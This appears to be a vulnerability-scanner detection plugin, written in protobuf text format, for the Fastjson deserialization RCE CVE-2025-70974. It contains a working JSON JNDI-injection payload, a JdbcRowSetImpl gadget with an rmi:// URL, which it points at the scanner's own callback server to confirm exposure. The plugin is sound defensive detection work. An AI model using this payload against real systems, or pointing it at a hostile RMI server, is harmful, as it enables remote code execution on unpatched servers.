# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "Fastjson_CVE_2025_70974"
  author: "Robert Dick (robert@doyensec.com)"
  version: "1.0"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "CVE-2025-70974"
  }
  severity: CRITICAL
  title: "Alibaba Fastjson Insecure Deserialization RCE (CVE-2025-70974)"
  description: "Due to insecure deserialization in Alibaba's Fastjson, there is a JNDI injection allowing loading remote classes and ultimately Remote Code Execution."
  recommendation: ""
  related_id: {
    publisher: "CVE"
    value: "CVE-2025-70974"
  }
}

config: {}

###########
# ACTIONS #
###########

actions: {
  name: "trigger_rmi"
  http_request: {
    method: POST
    uri: "/"
    headers: [
      { name: "Content-Type" value: "application/json" }
    ]
    data: "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{{ T_CBS_URI }}/NoObjectHere\",\"autoCommit\":true}}"
    client_options: {
      disable_follow_redirects: true
      ignore_http_client_errors: true
    }
  }
}

actions: {
  name: "sleep"
  utility: { sleep: { duration_ms: 1000 } }
}

actions: {
  name: "check_callback_server_logs"
  callback_server: { action_type: CHECK }
}


#############
# WORKFLOWS #
#############

workflows: {
  condition: REQUIRES_CALLBACK_SERVER
  actions: [
    "trigger_rmi",
    "sleep",
    "check_callback_server_logs"
  ]
}
